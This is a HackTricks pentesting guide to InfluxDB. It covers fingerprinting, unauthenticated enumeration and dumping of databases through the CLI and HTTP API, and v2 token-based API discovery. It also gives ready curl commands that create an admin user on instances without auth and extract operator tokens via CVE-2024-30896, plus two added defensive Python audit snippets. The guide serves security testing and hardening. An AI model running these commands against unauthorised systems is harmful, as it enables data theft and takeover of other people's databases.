8086 - Pentesting InfluxDB

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks
Basic Information

InfluxDB is an open-source time series database (TSDB) developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs offer significant savings in storage space and gains in performance for time series datasets. They use specialized compression algorithms and can be configured to automatically expire old data. Specialized database indexes also improve query performance.

Default port: 8086

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5

Identification and Version (HTTP)

  • v1.x: GET /ping returns status 204 and headers such as X-Influxdb-Version and X-Influxdb-Build.
  • v2.x+: GET /health returns JSON with the server version and status. It works without auth.
# v1 banner grab
curl -i http://<host>:8086/ping

# v2/compat health
curl -s http://<host>:8086/health | jq .

Notes: exposed instances often also serve Prometheus-style metrics at /metrics.

Enumeration

From a pentester's point of view, this is yet another database that may store sensitive information, so it is worth knowing how to dump all of it.

Authentication

InfluxDB may or may not require authentication.

# Try unauthenticated CLI (v1 shell)
influx -host <host> -port 8086
> use _internal

If you get an error like this: ERR: unable to parse authentication credentials it means the server expects credentials.

influx --username influx --password influx_pass

There was a vulnerability in influxdb that allowed bypassing authentication: CVE-2019-20933

Manual Enumeration (v1 HTTP API / InfluxQL)

Even when no CLI is available, the HTTP API is usually exposed on port 8086.

# List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

# List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"

# List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"

# List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"

# List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"

# Dump data from a measurement
curl -sG "http://<host>:8086/query" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .

# Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
--data-urlencode "epoch=ns" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'

Warning

In some tests with the authentication bypass it was noted that the table name had to be placed in double quotes, like: select * from "cpu"

If authentication is disabled, you can even create users and escalate:

# Create an admin user (v1, auth disabled)
curl -sG "http://<host>:8086/query" \
--data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
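As an added example (not code from the original page), a small Python posture check for the v1 HTTP API above: it tells an instance that enforces auth (401) apart from one that answers unauthenticated InfluxQL, and flattens the results/series/columns/values JSON that jq shows into rows. The sample responses are constructed; the query() helper and its base URL argument are assumptions.

```python
import json
import urllib.error
import urllib.parse
import urllib.request

# Constructed sample responses in the shape the v1 /query endpoint returns
# (not captured from a real host).
SAMPLE_AUTH_ERROR = (401, '{"error":"unable to parse authentication credentials"}')
SAMPLE_SHOW_DBS = (200, json.dumps({"results": [{"statement_id": 0, "series": [
    {"name": "databases", "columns": ["name"], "values": [["telegraf"], ["_internal"]]}]}]}))
SAMPLE_SELECT = (200, json.dumps({"results": [{"statement_id": 0, "series": [
    {"name": "cpu", "columns": ["time", "cpu", "host", "usage_idle"],
     "values": [[1497018760000000000, "cpu-total", "ubuntu", 99.297893681046],
                [1497018760000000000, "cpu1", "ubuntu", 99.69909729188728]]}]}]}))
SAMPLE_STMT_ERROR = (200, '{"results":[{"statement_id":0,"error":"database not found: nope"}]}')

def query(base_url, q, db=None, timeout=5):
    """Send one InfluxQL statement to /query without credentials; return (status, body)."""
    params = {"q": q, **({"db": db} if db else {})}
    url = base_url.rstrip("/") + "/query?" + urllib.parse.urlencode(params)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()

def classify(status, body):
    """Posture check: 401 means auth is enforced; a 200 carrying 'results' means the
    endpoint answered an unauthenticated query, i.e. auth is disabled."""
    if status == 401:
        return "auth_required"
    try:
        data = json.loads(body)
    except ValueError:
        return "other"  # not an InfluxDB JSON response at all
    return "unauthenticated_query_ok" if status == 200 and "results" in data else "other"

def series_rows(body):
    """Flatten results -> series -> columns/values into one dict per row.
    Statement-level errors (e.g. unknown database) are raised, not swallowed."""
    rows = []
    for result in json.loads(body).get("results", []):
        if "error" in result:
            raise ValueError(result["error"])
        for series in result.get("series", []):
            for values in series.get("values", []):
                row = dict(zip(series["columns"], values))
                row["_measurement"] = series.get("name")
                rows.append(row)
    return rows
```

Run classify(*query("http://<host>:8086", "SHOW DATABASES")) against your own instance; anything other than "auth_required" on a network-reachable port is a finding.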

The following CLI example output was taken from here.

Show databases

The databases found are telegraf and _internal (you will find the latter everywhere)

> show databases
name: databases
name
----
telegraf
_internal

Show tables/measurements

The InfluxDB documentation explains that measurements in InfluxDB can be compared to SQL tables. The names of these measurements reflect their content, each one storing data related to a specific entity.

> show measurements
name: measurements
name
----
cpu
disk
diskio
kernel
mem
processes
swap
system

Show columns/field keys

Field keys are like the columns of the database

> show field keys
name: cpu
fieldKey         fieldType
--------         ---------
usage_guest      float
usage_guest_nice float
usage_idle       float
usage_iowait     float

name: disk
fieldKey     fieldType
--------     ---------
free         integer
inodes_free  integer
inodes_total integer
inodes_used  integer

[ ... more keys ...]

Dump Table

And finally you can dump the table by doing something like

select * from cpu
name: cpu
time                cpu       host   usage_guest usage_guest_nice usage_idle        usage_iowait        usage_irq usage_nice usage_softirq        usage_steal usage_system        usage_user
----                ---       ----   ----------- ---------------- ----------        ------------        --------- ---------- -------------        ----------- ------------        ----------
1497018760000000000 cpu-total ubuntu 0           0                99.297893681046   0                   0         0          0                    0           0.35105315947842414 0.35105315947842414
1497018760000000000 cpu1      ubuntu 0           0                99.69909729188728 0                   0         0          0                    0           0.20060180541622202 0.10030090270811101

InfluxDB v2.x API (Token-based)

InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:

# Basic org, bucket, and auth discovery
TOKEN="<token>"
AUTH="Authorization: Token $TOKEN"   # pass it as -H "$AUTH": quoting keeps the header as one argument

# Health & version
curl -s http://<host>:8086/health | jq .

# List organizations
curl -s -H "$AUTH" http://<host>:8086/api/v2/orgs | jq .

# List buckets
curl -s -H "$AUTH" 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

# List authorizations (requires perms)
ORGID=<org_id>
curl -s -H "$AUTH" "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

# Query data with Flux (the org must be given as a query parameter)
curl -s -H "$AUTH" -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
-X POST "http://<host>:8086/api/v2/query?orgID=$ORGID" \
--data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'

Notes

  • On v1.8+, some v2-compatible endpoints exist (/api/v2/query, /api/v2/write, /health). This matters when the server is v1 but accepts v2-style requests.
  • On v2, the HTTP Authorization header must have the form Token <value>.

Automated Enumeration

msf6 > use auxiliary/scanner/http/influxdb_enum

Recent interesting vulns and privesc (last few years)

  • InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). In specific setups, an authenticated user with read access to the authorization resource in the default organization could list and obtain the instance-wide operator token (e.g., via influx auth ls or GET /api/v2/authorizations). With that token, an attacker can manage the instance (buckets, tokens, users) and reach all data across orgs. Update to a fixed build when available and avoid placing regular users in the default org. Quick test:

# Using a low-priv/all-access token tied to the default org
curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
# Look for entries of type "operator" and extract the raw token (if present)

  • Many legacy 1.x deployments still expose /query and /write on the network without authentication. If auth is disabled, you can copy or even modify time series at will, and you can also create admin users as shown above. Always verify against the HTTP API even if the CLI turns you away.
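As an added example (not HackTricks' or InfluxData's code), the audit a defender would run over the output of GET /api/v2/authorizations from the v2 API section and the CVE-2024-30896 bullet above: it flags authorizations that carry operator-style instance-wide permissions or control sensitive resource types, and records whether the listing handed back the raw token. The response sample is constructed with placeholder ids and tokens, and treating a permission whose resource lacks an orgID as instance-wide is an assumption about how operator tokens appear.

```python
import json

# Constructed sample in the shape of GET /api/v2/authorizations (placeholder ids and
# tokens, not from a real deployment). The second entry mimics an operator token.
SAMPLE_AUTHS = json.dumps({"authorizations": [
    {"id": "0a1b2c3d4e5f6071", "description": "telegraf write", "status": "active",
     "orgID": "8f9e0d1c2b3a4958", "userID": "1122334455667788", "token": "<placeholder-1>",
     "permissions": [{"action": "write", "resource": {"type": "buckets",
                      "orgID": "8f9e0d1c2b3a4958", "id": "aabbccddeeff0011"}}]},
    {"id": "1b2c3d4e5f607182", "description": "admin's Token", "status": "active",
     "orgID": "8f9e0d1c2b3a4958", "userID": "99aabbccddeeff00", "token": "<placeholder-2>",
     "permissions": [{"action": a, "resource": {"type": t}} for a in ("read", "write")
                     for t in ("authorizations", "buckets", "orgs", "users")]},
]})

# Resource types whose management lets a holder mint tokens or control identities.
SENSITIVE_TYPES = {"authorizations", "users", "orgs"}

def audit_authorizations(body):
    """Return one finding per authorization a defender should review: instance-wide
    (operator-style) permissions, control over sensitive resource types, and whether
    the listing returned the raw token, which is what makes the exposure exploitable."""
    findings = []
    for auth in json.loads(body).get("authorizations", []):
        perms = auth.get("permissions", [])
        # Assumption: a permission whose resource has no orgID applies to the whole instance.
        instance_wide = [p for p in perms if "orgID" not in p.get("resource", {})]
        sensitive = {p["resource"].get("type") for p in perms} & SENSITIVE_TYPES
        if not (instance_wide or sensitive):
            continue  # ordinary scoped token, e.g. a per-bucket write token
        reasons = []
        if instance_wide:
            reasons.append("%d instance-wide permission(s)" % len(instance_wide))
        if sensitive:
            reasons.append("manages " + ", ".join(sorted(sensitive)))
        if "token" in auth:
            reasons.append("raw token returned in listing")
        findings.append({"id": auth.get("id"), "description": auth.get("description"),
                         "userID": auth.get("userID"), "status": auth.get("status"),
                         "reasons": reasons})
    return findings
```

Feed it the body of the curl call from the bullet above; any finding whose reasons include the raw token means that every user who can read authorizations in that org can take over the instance.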
